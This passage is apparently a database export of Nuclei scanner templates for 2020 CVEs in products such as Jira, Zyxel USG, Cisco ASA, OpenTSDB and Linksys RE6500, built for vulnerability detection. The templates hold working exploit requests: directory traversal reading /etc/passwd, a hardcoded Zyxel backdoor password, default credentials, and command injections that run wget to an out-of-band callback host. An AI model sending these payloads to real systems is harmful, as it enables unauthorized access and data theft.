Atlassian to fix the vulnerability.\n reference:\n - https://jira.atlassian.com/browse/JRASERVER-72014\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29453\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-29453\n cwe-id: CWE-22\n epss-score: 0.01696\n epss-percentile: 0.86435\n cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: atlassian\n product: data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,atlassian,jira,lfi,intrusive\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml\"\n - \"{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - com.atlassian.jira\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b410f0ca39281dc5ddeda5d50abe2a078b267a53057d75e940219cba5187674c022035420ad1aa885d5b61ffc9bfa986feda8ce2adf3ebb1502d4a548c7c9e2b5ec2:922c64590222798bb761d5b6d8e72950", "hash": "305b931a5deb7e6d5c4fd1d0fbb4c463", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308203" }, "name": "CVE-2020-29583.yaml", "content": "id: CVE-2020-29583\n\ninfo:\n name: ZyXel USG - Hardcoded Credentials\n author: canberbamber\n severity: critical\n description: |\n A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. 
The account was designed to deliver automatic firmware updates to connected access points through FTP.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.\n remediation: |\n Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.\n reference:\n - https://www.zyxel.com/support/CVE-2020-29583.shtml\n - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29583\n - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html\n - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29583\n cwe-id: CWE-522\n epss-score: 0.96219\n epss-percentile: 0.99483\n cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: zyxel\n product: usg20-vpn_firmware\n shodan-query: title:\"USG FLEX 100\"\n tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev\n\nhttp:\n - raw:\n - |\n GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /ext-js/index.html HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_2\n words:\n - 'data-qtip=\"Web Console'\n - 'CLI'\n - 'Configuration\">'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205064009da027752d122ecf0014ab308168a1bc00b4b71c52380ea84c25f8d24502207f9d7991e9122052d9ecf249bf0e2129e660d62d0a04ae025cd5e64b1d57619d:922c64590222798bb761d5b6d8e72950", "hash": "5bc6b68a1ee1e4d0626fa179ac26414e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308204" }, "name": "CVE-2020-29597.yaml", "content": "id: 
CVE-2020-29597\n\ninfo:\n name: IncomCMS 2.0 - Arbitrary File Upload\n author: princechaddha\n severity: critical\n description: |\n IncomCMS 2.0 has an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files to the server.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.\n remediation: |\n Apply the latest security patch or update to a version that addresses the vulnerability.\n reference:\n - https://github.com/Trhackno/CVE-2020-29597\n - https://nvd.nist.gov/vuln/detail/CVE-2020-29597\n - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md\n - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html\n - https://github.com/trhacknon/CVE-2020-29597\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-29597\n cwe-id: CWE-434\n epss-score: 0.78448\n epss-percentile: 0.9817\n cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: incomcms_project\n product: incomcms\n tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project\n\nhttp:\n - raw:\n - |\n POST /incom/modules/uploader/showcase/script.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n ------WebKitFormBoundaryBEJZt0IK73M2mAbt\n Content-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\n Content-Type: text/html\n\n {{randstr_2}}\n ------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n - |\n GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}'\n\n - type: word\n part: body_2\n words:\n - '{{randstr_2}}'\n# digest: 
4a0a00473045022100ab5832fbca2af41f73d0a9dd5b7e6a5d11131ec0ef50cf26f0613d515b953718022046f83ee4202dafd7b1a1b379f116c6d1a31b1ebe1dc45a9e355c444f9e84e968:922c64590222798bb761d5b6d8e72950", "hash": "fb3c371ba2fe745a249589aec387695f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308205" }, "name": "CVE-2020-3187.yaml", "content": "id: CVE-2020-3187\n\ninfo:\n name: Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal\n author: KareemSe1im\n severity: critical\n description: Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are susceptible to directory traversal vulnerabilities that could allow an unauthenticated, remote attacker to obtain read and delete access to sensitive files on a targeted system.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the affected system, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to mitigate the vulnerability.\n reference:\n - https://twitter.com/aboul3la/status/1286809567989575685\n - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43\n - https://nvd.nist.gov/vuln/detail/CVE-2020-3187\n - https://github.com/Threekiii/Awesome-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2020-3187\n cwe-id: CWE-22\n epss-score: 0.97297\n epss-percentile: 0.99857\n cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: firepower_threat_defense\n tags: cve,cve2020,cisco,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/+CSCOE+/session_password.html\"\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - webvpn\n - Webvpn\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b9abee5c6511698f97786ab8db734d9eb2863fe4212007059d4b777ba852ba8c022100d1336ba7f8555d17cc2c36c2a593c376a9b242d418b518cb295a0808617f4b80:922c64590222798bb761d5b6d8e72950", "hash": "56aea4a1cc68557d79d61091dcc983e2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308206" }, "name": "CVE-2020-3452.yaml", "content": "id: CVE-2020-3452\n\ninfo:\n name: Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion\n author: pdteam\n severity: high\n description: |\n Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Cisco to fix the vulnerability.\n reference:\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n - https://nvd.nist.gov/vuln/detail/CVE-2020-3452\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-3452\n cwe-id: CWE-22,CWE-20\n epss-score: 0.97531\n epss-percentile: 0.99992\n cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: cisco\n product: adaptive_security_appliance_software\n tags: cve,cve2020,lfi,kev,packetstorm,cisco\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\"\n - \"{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\"\n\n matchers:\n - type: word\n words:\n - \"INTERNAL_PASSWORD_ENABLED\"\n - \"CONF_VIRTUAL_KEYBOARD\"\n condition: and\n# digest: 4a0a004730450220083b1af8636250e0a465400427ebe39df44c1fd2fdafc0ab28ceac1ec21a2b6a022100ca085d560a8304af5d6162c1f37d3d62931dc1454d92c6003bff69c446ddc062:922c64590222798bb761d5b6d8e72950", "hash": 
"4823e8c192ed898a9ff4f2592de2cafb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308207" }, "name": "CVE-2020-35234.yaml", "content": "id: CVE-2020-35234\n\ninfo:\n name: SMTP WP Plugin Directory Listing\n author: PR3R00T\n severity: high\n description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.\n impact: |\n Low: Information disclosure\n remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35234\n - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/\n - https://wordpress.org/plugins/easy-wp-smtp/#developers\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35234\n cwe-id: CWE-532\n epss-score: 0.37649\n epss-percentile: 0.97105\n cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wp-ecommerce\n product: easy_wp_smtp\n framework: wordpress\n tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/easy-wp-smtp/\"\n - \"{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/\"\n\n matchers:\n - type: word\n words:\n - \"debug\"\n - \"log\"\n - \"Index of\"\n condition: and\n# digest: 4a0a00473045022100b5b245278cf9f882c12ccd7f432d9ad044ce3e1d7d1040268987c3b0da6b38dc02206edf464d73fbe6176784b8e1f637bf87e468ab8a348d61afba6779c4abe0d4d7:922c64590222798bb761d5b6d8e72950", "hash": "ec416321d00b5bf0838b0792940a2e81", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308208" }, "name": "CVE-2020-35338.yaml", "content": "id: CVE-2020-35338\n\ninfo:\n name: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection\n 
author: Jeya Seelan\n severity: critical\n description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the server.\n remediation: |\n Change the default credentials to strong and unique ones.\n reference:\n - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35338\n - https://www.mobileviewpoint.com/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35338\n cwe-id: CWE-798\n epss-score: 0.29702\n epss-percentile: 0.96805\n cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mobileviewpoint\n product: wireless_multiplex_terminal_playout_server\n tags: cve,cve2020,wmt,default-login,mobileviewpoint\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/server/\"\n\n headers:\n Authorization: \"Basic OnBva29u\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"WMT Server playout\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d90bc7e3d71533f0575c136f4f13a6f7a419598ac09d57913c52d0239e3ac87d0221009ca68b1baddc88c46aaa979a70542106d8e7165c78038258ac7f35037066fee9:922c64590222798bb761d5b6d8e72950", "hash": "a665cb9f66081a4629fe7cd8114038a1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308209" }, "name": "CVE-2020-35476.yaml", "content": "id: CVE-2020-35476\n\ninfo:\n name: OpenTSDB <=2.4.0 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: |\n OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. 
An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability.\n reference:\n - https://github.com/OpenTSDB/opentsdb/issues/2051\n - http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35476\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35476\n cwe-id: CWE-78\n epss-score: 0.95741\n epss-percentile: 0.99293\n cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: opentsdb\n product: opentsdb\n shodan-query: html:\"OpenTSDB\"\n tags: cve,cve2020,opentsdb,rce,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - plotted\n - timing\n - cachehit\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205a5db837668619514abd4b5a118f7e041c8f574a24b94397925bfe86afa7e3b90221009e04fec147cf698f9d10617130be06ffd77f3b4b3e7e1f035ec980127c66bded:922c64590222798bb761d5b6d8e72950", "hash": "3f268c4e75101bd6290bc0327415caab", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820a" }, "name": "CVE-2020-35489.yaml", "content": "id: CVE-2020-35489\n\ninfo:\n name: WordPress Contact Form 7 - Unrestricted File Upload\n author: soyelmago\n severity: 
critical\n description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to the target system and potential remote code execution.\n remediation: |\n Update to the latest version of the Contact Form 7 plugin to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35489\n - https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/\n - https://wordpress.org/plugins/contact-form-7/#developers\n - https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/\n - https://contactform7.com/2020/12/17/contact-form-7-532/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-35489\n cwe-id: CWE-434\n epss-score: 0.88428\n epss-percentile: 0.98435\n cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: rocklobster\n product: contact_form_7\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,rce,rocklobster\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 5.3.2')\n\n - type: word\n part: body\n words:\n - \"Contact Form 7\"\n - '== Changelog =='\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n internal: true\n\n - type: regex\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n# digest: 4a0a0047304502200119d40e914be20d2c6e92899c0f92c4d47e25598a6a62e070775ac3598541ac022100f55d4088bdcb51738c6039670f2b8f9a5196c7f7458c1f9094355d76e42655ad:922c64590222798bb761d5b6d8e72950", "hash": 
"cff979372ff068590db38c91824e17ee", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820b" }, "name": "CVE-2020-35580.yaml", "content": "id: CVE-2020-35580\n\ninfo:\n name: SearchBlox <9.2.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability.\n reference:\n - https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html\n - https://developer.searchblox.com/docs/getting-started-with-searchblox\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35580\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35580\n cwe-id: CWE-22\n epss-score: 0.01833\n epss-percentile: 0.87972\n cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: searchblox\n product: searchblox\n tags: cve2020,cve,lfi,searchblox\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 
4a0a0047304502201da11702e06331d8f8ff219e8bc69220f6171544ccfca6ecad9fef40ba169072022100fd26ae7a0963bb2a89e2e46906d37c053117091322cb077181667ab57e425b6d:922c64590222798bb761d5b6d8e72950", "hash": "fc568a85273b8ed9a942928228411564", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820c" }, "name": "CVE-2020-35598.yaml", "content": "id: CVE-2020-35598\n\ninfo:\n name: Advanced Comment System 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0.\n reference:\n - https://www.exploit-db.com/exploits/49343\n - https://seclists.org/fulldisclosure/2020/Dec/13\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35598\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35598\n cwe-id: CWE-22\n epss-score: 0.11153\n epss-percentile: 0.9467\n cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advanced_comment_system_project\n product: advanced_comment_system\n tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n 
status:\n - 200\n# digest: 4a0a00473045022100911e463b70d73004e8ef94a9baaac09e041d404c58da64317ee96c7588297ba00220192e115eb0658148208f16c7326d2bc2148e422ac20569cd1d135b81008c25f4:922c64590222798bb761d5b6d8e72950", "hash": "663461cf563ae07856cfaec28031c780", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820d" }, "name": "CVE-2020-35713.yaml", "content": "id: CVE-2020-35713\n\ninfo:\n name: Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution\n author: gy741\n severity: critical\n description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later.\n reference:\n - https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt\n - https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35713\n - https://bugcrowd.com/disclosures/72d7246b-f77f-4f7f-9bd1-fdc35663cc92/linksys-re6500-unauthenticated-rce-working-across-multiple-fw-versions\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35713\n cwe-id: CWE-78\n epss-score: 0.96729\n epss-percentile: 0.9964\n cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: linksys\n product: re6500_firmware\n tags: cve,cve2020,linksys,rce,oast,router\n\nhttp:\n - raw:\n - |\n POST /goform/setSysAdm HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/login.shtml\n\n admuser=admin&admpass=;wget 
http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022075f0d76f377b911a20e32b13ad32f15eb5fb1e0fedbbe5b7660104f21d20d391022100f93eba91a2d924cd4d3530e6362549fdf26d23ebb303d135ddefc8da78e196a8:922c64590222798bb761d5b6d8e72950", "hash": "d9c6b14d812f1c7eb85b012362f16431", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820e" }, "name": "CVE-2020-35729.yaml", "content": "id: CVE-2020-35729\n\ninfo:\n name: Klog Server <=2.41 - Unauthenticated Command Injection\n author: dwisiswant0\n severity: critical\n description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. 
Originated from Metasploit module, copyright (c) space-r7.\n impact: |\n An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system.\n remediation: |\n Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch.\n reference:\n - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35729\n - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/Exploit_Code\n - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/README.md\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35729\n cwe-id: CWE-78\n epss-score: 0.95566\n epss-percentile: 0.99266\n cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: klogserver\n product: klog_server\n tags: cve,cve2020,klog,rce,klogserver\nvariables:\n dummy: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/actions/authenticate.php\"\n\n body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo \"cHJvamVjdGRpc2NvdmVyeS5pbw==\" | base64 -d & echo\"\n matchers:\n - type: word\n words:\n - \"poc-testing\" # from Base64 decoding payload\n# digest: 4b0a004830460221009a8413eb8da32ae540f0c5407408a59e973b61aee402b8f4ba704f472fec5d9a022100956d367efc9e53145c4b07d3bb2b8c5b0bde6f211a12b4e42160e5a4d9783ea2:922c64590222798bb761d5b6d8e72950", "hash": "fb09c1d217bddeca7b9e2eb1dda99522", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820f" }, "name": "CVE-2020-35736.yaml", "content": "id: CVE-2020-35736\n\ninfo:\n name: GateOne 1.1 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: GateOne 1.1 allows arbitrary file retrieval without 
authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1.\n reference:\n - https://github.com/liftoff/GateOne/issues/747\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35736\n - https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35736\n cwe-id: CWE-22\n epss-score: 0.01204\n epss-percentile: 0.83699\n cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: liftoffsoftware\n product: gateone\n tags: cve,cve2020,gateone,lfi,liftoffsoftware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n 